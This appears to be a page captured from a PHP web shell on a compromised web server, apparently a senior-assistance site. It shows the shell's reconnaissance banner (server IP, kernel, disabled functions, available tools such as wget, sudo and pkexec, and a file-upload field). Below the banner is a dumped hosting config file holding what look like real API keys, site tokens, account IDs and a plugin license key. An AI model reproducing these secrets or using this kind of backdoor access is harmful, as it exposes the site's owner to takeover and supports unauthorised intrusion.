Server IP : 3.128.248.115 / Your IP : 3.147.86.143 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ip-172-31-33-233 5.15.0-1037-aws #41~20.04.1-Ubuntu SMP Mon May 22 18:18:00 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.28 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/myseniorassistance.org/ |
Upload File : |
<?php define( 'GD_VIP', '166.62.110.213' ); define( 'GD_RESELLER', 1 ); define( 'GD_ASAP_KEY', '9d7bc0eb82f180cd31beb996b8d74b83' ); define( 'GD_STAGING_SITE', false ); define( 'GD_EASY_MODE', true ); define( 'GD_SITE_CREATED', 1550221761 ); define( 'GD_ACCOUNT_UID', 'aca7be96-313b-11e9-8168-3417ebe72595' ); define( 'GD_SITE_TOKEN', '185bdb75-6bb0-4a75-ae83-c6bf30a29c90' ); define( 'GD_TEMP_DOMAIN', 'a67.3b0.myftpupload.com' ); define( 'GD_CDN_ENABLED', FALSE ); define( 'GD_GF_LICENSE_KEY', '4fPRW653O0GEG0XqikPi75noZO276LJh' ); // Newrelic tracking if ( function_exists( 'newrelic_set_appname' ) ) { newrelic_set_appname( 'aca7be96-313b-11e9-8168-3417ebe72595;' . ini_get( 'newrelic.appname' ) ); } /** * Is this is a mobile client? Can be used by batcache. * @return array */ function is_mobile_user_agent() { return array( "mobile_browser" => !in_array( $_SERVER['HTTP_X_UA_DEVICE'], array( 'bot', 'pc' ) ), "mobile_browser_tablet" => false !== strpos( $_SERVER['HTTP_X_UA_DEVICE'], 'tablet-' ), "mobile_browser_smartphones" => in_array( $_SERVER['HTTP_X_UA_DEVICE'], array( 'mobile-iphone', 'mobile-smartphone', 'mobile-firefoxos', 'mobile-generic' ) ), "mobile_browser_android" => false !== strpos( $_SERVER['HTTP_X_UA_DEVICE'], 'android' ) ); }